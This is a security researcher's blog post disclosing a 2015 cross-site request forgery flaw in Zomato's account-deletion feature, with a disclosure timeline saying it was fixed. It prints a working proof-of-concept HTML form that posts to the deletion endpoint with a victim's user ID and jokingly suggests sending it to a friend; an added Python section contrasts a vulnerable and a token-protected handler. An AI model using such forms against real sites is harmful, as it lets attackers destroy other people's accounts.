How I deleted your Zomato account!

Hi friends 😀,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I was caught by it, so I was messing around with Zomato. While checking out the settings section I found the “delete my account” option, and after clicking on that a prompt like this appears:

[Screenshot: zomato hack]

Now, to delete the account you have to type “delete” inside it and confirm! But there was a flaw: there was no CSRF token available to validate the request!

What is a CSRF token?
A CSRF token is a protective measure against cross-site request forgery attacks: a secret, unpredictable value tied to the user's session that the server requires on every state-changing request. Because a page on another site cannot read that value, its presence lets the server check whether the request really came from the legitimate user's own page or was forged by a third-party site that simply relies on the browser attaching the victim's session cookie.

Now the exploitation part
I created a quick working piece of code which allows you to delete any user’s account. To delete his or her account you just need to send this code as an HTML page or as a link. 😛

Code:
<html>
<body>
<!-- Cross-site form posting to the delete endpoint; the browser attaches the victim's Zomato session cookie automatically -->
<form action="https://www.zomato.com/php/delete_user_profile.php" method="POST">
<input type="hidden" name="reason" value="woot woot">
<!-- The victim's user ID, copied from their public profile -->
<input type="hidden" name="userid" value="[User ID to whom you wanna delete]">
<input type="submit" value="Submit request">
</form>
</body>
</html>

Video PoC:
Save this as delete.html and send it to your friend!

https://www.youtube.com/watch?v=fRjdyg6s9rU

Exploitability?

It was easy to grab any user’s userid by just visiting their profile and copying that user ID, which increased the severity. 😉
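To make the flaw and the fix concrete, here is an added example that is not Zomato's code and not from the original post. It models the delete endpoint as a plain Python function in two versions: the vulnerable shape described above (any logged-in session plus an attacker-chosen userid deletes that user) and a hardened one that requires a per-session CSRF token, compares it in constant time, demands the typed confirmation, and deletes the session's own user instead of trusting the userid field from the profile page. The account table, session dicts and field names are constructed for the demo and are assumptions, not Zomato's real parameters.

```python
"""Added example (not Zomato's code): a CSRF-vulnerable account-deletion
handler beside a hardened one, replayed against the attacker's cross-site form.

Assumptions (hypothetical, not from the original post): the endpoint is modelled
as a function taking the caller's session dict and the POST form dict; the
hardened version stores a per-session token in the session and requires it in
the form, and acts on the session's own user rather than a 'userid' field.
"""
import hmac
import secrets

# Constructed sample accounts; 'deleted' flips when a handler removes one.
ACCOUNTS = {"1001": {"name": "victim", "deleted": False},
            "2002": {"name": "attacker", "deleted": False}}


def reset_accounts():
    for acct in ACCOUNTS.values():
        acct["deleted"] = False


def delete_user_profile_vulnerable(session, form):
    """Mirrors the flaw in the post: any authenticated session (cookie attached
    automatically by the browser) plus a 'userid' field deletes that user.
    Nothing ties the request to the page that legitimately rendered the form."""
    if "user_id" not in session:
        return 401, "login required"
    target = form.get("userid")
    if target not in ACCOUNTS:
        return 404, "no such user"
    ACCOUNTS[target]["deleted"] = True
    return 200, f"deleted {target}"


def issue_csrf_token(session):
    """Called when rendering the 'delete my account' prompt: mint an unpredictable
    per-session token and remember it server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def delete_user_profile_hardened(session, form):
    """Require the session-bound token (constant-time compare), require the typed
    confirmation, and delete the session's own user, never a form-supplied id."""
    if "user_id" not in session:
        return 401, "login required"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "invalid csrf token"
    if form.get("confirm") != "delete":
        return 400, "type delete to confirm"
    target = session["user_id"]          # never taken from the form
    ACCOUNTS[target]["deleted"] = True
    session.pop("csrf_token", None)      # single use
    return 200, f"deleted {target}"


def attacker_form():
    """The fields a cross-site page like delete.html can send: it can pick any
    userid but cannot read the victim's session token (same-origin policy)."""
    return {"reason": "woot woot", "userid": "1001"}


def run_scenario():
    """Replay the attack against both handlers from the victim's logged-in session."""
    reset_accounts()
    victim_session = {"user_id": "1001"}
    vuln = delete_user_profile_vulnerable(victim_session, attacker_form())
    vuln_deleted = ACCOUNTS["1001"]["deleted"]

    reset_accounts()
    victim_session = {"user_id": "1001"}
    issue_csrf_token(victim_session)     # victim has the real prompt open
    hard_attack = delete_user_profile_hardened(victim_session, attacker_form())
    attack_deleted = ACCOUNTS["1001"]["deleted"]

    # Legitimate flow: the rendered form carries the token and the typed word;
    # a userid field pointing at someone else is ignored.
    legit_form = {"csrf_token": victim_session["csrf_token"], "confirm": "delete",
                  "reason": "leaving", "userid": "2002"}
    legit = delete_user_profile_hardened(victim_session, legit_form)
    return {
        "vulnerable_status": vuln[0], "vulnerable_deleted": vuln_deleted,
        "hardened_attack_status": hard_attack[0], "hardened_attack_deleted": attack_deleted,
        "legit_status": legit[0], "legit_deleted_victim": ACCOUNTS["1001"]["deleted"],
        "legit_other_untouched": not ACCOUNTS["2002"]["deleted"],
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

Run it and the vulnerable handler deletes the victim with a 200 from nothing but the two fields in delete.html, while the hardened handler answers 403 to the same form and only succeeds for the form the site itself rendered. Two design points matter beyond the token: the target account comes from the session, so a public userid on a profile page is no longer useful to an attacker, and marking the session cookie SameSite=Lax stops the browser from attaching it to a cross-site POST at all, as defence in depth.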

[+] Fixing timeline

[+] July 21, 2015: Reported to the CEO (report sent to Deepinder Goyal) and the CTO
[+] July 21, 2015: Reported to the support team
[+] Bug fixed by the team.

Let the #internet be a #safer place 🙂
signoff
